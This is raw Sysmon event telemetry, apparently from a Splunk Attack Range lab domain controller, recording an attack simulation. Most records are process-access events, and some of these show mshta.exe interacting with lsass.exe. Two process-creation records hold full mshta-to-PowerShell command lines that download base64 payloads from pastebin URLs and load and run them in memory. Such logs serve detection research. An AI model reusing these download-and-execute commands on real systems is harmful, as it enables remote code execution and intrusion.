07:59:29.546{58E9C193-B461-615A-2E02-00000000FC01}75327564C:\Windows\system32\conhost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.544{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2D02-00000000FC01}7516C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.544{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2D02-00000000FC01}7516C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082965Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:29.820{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082964Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:29.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350DE600D88241CB804DEDD3F376C2CE,SHA256=80559737BF2A39CB9247C8A19669CCB732B3A55654018EF5D7C738DEB3F24607,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.539{58E9C193-B461-615A-2D02-00000000FC01}75167548C:\Windows\system32\conhost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.538{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2E02-00000000FC01}7532C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.531{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2D02-00000000FC01}7516C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.530{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.530{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.530{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.530{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.529{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.529{58E9C193-B461-615A-2A02-00000000FC01}74167496C:\Windows\system32\mshta.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.529{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.526{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.525{58E9C193-B461-615A-2802-00000000FC01}73647492C:\Windows\system32\mshta.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.525{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.489{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.487{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.487{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.485{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.484{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.482{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.470{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.469{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.465{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 